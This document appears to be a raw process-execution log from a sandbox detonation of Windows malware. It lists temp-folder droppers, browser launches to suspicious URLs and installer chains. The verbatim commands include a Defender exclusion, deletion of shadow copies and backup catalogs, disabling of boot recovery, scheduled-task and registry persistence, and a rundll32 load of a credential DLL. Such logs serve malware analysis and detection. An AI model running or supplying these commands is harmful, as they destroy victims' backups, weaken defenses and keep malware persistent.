C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Users\Admin\AppData\Local\Temp\1912.exe
C:\Users\Admin\AppData\Local\Temp\1912.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://trecker33442aq.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=721
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffdc7f46f8,0x7fffdc7f4708,0x7fffdc7f4718
C:\Users\Admin\AppData\Local\Temp\003a3b70-6dcd-43dc-9f01-f8d1cbc33f03\AdvancedRun.exe
"C:\Users\Admin\AppData\Local\Temp\003a3b70-6dcd-43dc-9f01-f8d1cbc33f03\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\003a3b70-6dcd-43dc-9f01-f8d1cbc33f03\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
C:\Users\Admin\AppData\Local\Temp\3C6A.exe
C:\Users\Admin\AppData\Local\Temp\3C6A.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\003a3b70-6dcd-43dc-9f01-f8d1cbc33f03\test.bat"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2sd02z0z.mka\GcleanerEU.exe /eufive & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3104 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3124 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\47A6.exe
C:\Users\Admin\AppData\Local\Temp\47A6.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffdc7f46f8,0x7fffdc7f4708,0x7fffdc7f4718
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\2sd02z0z.mka\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\2sd02z0z.mka\GcleanerEU.exe /eufive
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\apncvajf.3s4\installer.exe /qn CAMPAIGN="654" & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3rigxgq2.0t2\ufgaa.exe & exit
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\703E.exe
C:\Users\Admin\AppData\Local\Temp\703E.exe
C:\Users\Admin\AppData\Local\Temp\apncvajf.3s4\installer.exe
C:\Users\Admin\AppData\Local\Temp\apncvajf.3s4\installer.exe /qn CAMPAIGN="654"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\1912.exe" -Force
C:\Users\Admin\AppData\Local\Temp\1912.exe
C:\Users\Admin\AppData\Local\Temp\1912.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5736 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 5328 -ip 5328
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5868 /prefetch:8
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1488 -ip 1488
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ln1yyofb.l5k\anyname.exe & exit
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5328 -s 288
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 39EE19C65A9234F784013CDCFB4D90B0 C
C:\Users\Admin\AppData\Local\Temp\974F.exe
C:\Users\Admin\AppData\Local\Temp\974F.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1488 -s 296
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\ln1yyofb.l5k\anyname.exe
C:\Users\Admin\AppData\Local\Temp\ln1yyofb.l5k\anyname.exe
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5868 /prefetch:8
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -start
C:\Users\Admin\AppData\Local\Temp\ln1yyofb.l5k\anyname.exe
"C:\Users\Admin\AppData\Local\Temp\ln1yyofb.l5k\anyname.exe" -q
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zjylqg20.pmv\gcleaner.exe /mixfive & exit
C:\Users\Admin\AppData\Local\Temp\zjylqg20.pmv\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\zjylqg20.pmv\gcleaner.exe /mixfive
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 5828 -ip 5828
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5828 -s 820
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 7580 -ip 7580
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7580 -s 884
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\apncvajf.3s4\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\apncvajf.3s4\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629403837 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4464 -ip 4464
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 288
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wied5by0.qki\autosubplayer.exe /S & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im MSBuild.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & del C:\ProgramData\*.dll & exit
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Windows\SysWOW64\taskkill.exe
taskkill /im MSBuild.exe /f
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\smss.exe" -agent 0
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
C:\Windows\sysWOW64\wbem\wmiprvse.exe
C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\a.exe
"C:\Users\Admin\AppData\Local\Temp\a.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\8a643770bf\drbux.exe
"C:\Users\Admin\AppData\Local\Temp\8a643770bf\drbux.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8a643770bf\
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN drbux.exe /TR "C:\Users\Admin\AppData\Local\Temp\8a643770bf\drbux.exe" /F
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\8a643770bf\
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4584 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\clpp.exe
"C:\Users\Admin\AppData\Local\Temp\clpp.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Intel Rapid\IntelRapid.exe
"C:\Users\Admin\AppData\Roaming\Intel Rapid\IntelRapid.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3372 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\ccleaner.exe
"C:\Users\Admin\AppData\Local\Temp\ccleaner.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2216,88590065161410142,3314017797234145916,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\ServiceMicrosoftApi\MicrosoftApi.exe
"C:\Users\Admin\AppData\Roaming\ServiceMicrosoftApi\MicrosoftApi.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
C:\Windows\SysWOW64\notepad.exe
notepad.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\ProgramData\ca82a716069a53\cred.dll, Main
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpFCBC.tmp.cmd""
